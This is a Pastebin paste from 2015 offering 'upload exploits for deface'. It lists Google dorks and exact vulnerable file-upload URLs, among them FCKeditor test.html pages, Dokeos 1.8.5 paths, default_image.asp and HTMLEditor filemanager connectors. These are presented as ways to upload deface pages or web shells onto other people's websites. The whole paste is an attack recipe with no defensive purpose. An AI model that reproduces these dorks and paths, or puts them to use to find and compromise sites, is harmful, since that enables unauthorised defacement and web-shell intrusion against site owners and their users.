API tools faq
paste
Advertisement
Kyfx

FCK,HTML,UPLOAD EXPLOITS FOR DEFACE TXT JPG AND OTHER SHITS

Kyfx
Sep 15th, 2015
770
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.20 KB | None | 0 0
raw download clone embed print report
  1. This is a vulnerability which allows a remote attacker to upload his/her deface or shell on the website.
  2.  
  3.  
  4. Google Dork : inurl:ft2.php intext:upload
  5.  
  6.  
  7.  
  8.  
  9. This is the vulnerability similar to FCK Editor file upload vulnerability which allows you to upload your and or shell on the target website.
  10.  
  11. Google Dork: "Portail Dokeos 1.8.5"
  12. Vulnerable URL: http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
  13.  
  14. Goto :http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.htm
  15.  
  16.  
  17.  
  18. This vulnerability can be used to upload your deface,shell or image on a website.
  19. Google Dorks:inurl:"default_image.asp"
  20. inurl:"default_imagen.asp"
  21. inurl:"/box_image.htm"
  22.  
  23.  
  24.  
  25. This is a exploit which can be used to upload .JPG and .TXT on the website
  26. Dork: inurl:/HTMLEditor/editor/
  27. "inurl:/HTMLEditor/editor//filemanager/"
  28. "inurl:/HTMLEditor/editor//filemanager//connectors/"
  29.  
  30. Use any one above mentioned dork.
  31.  
  32. Vulnerable URL: http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
  33. http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!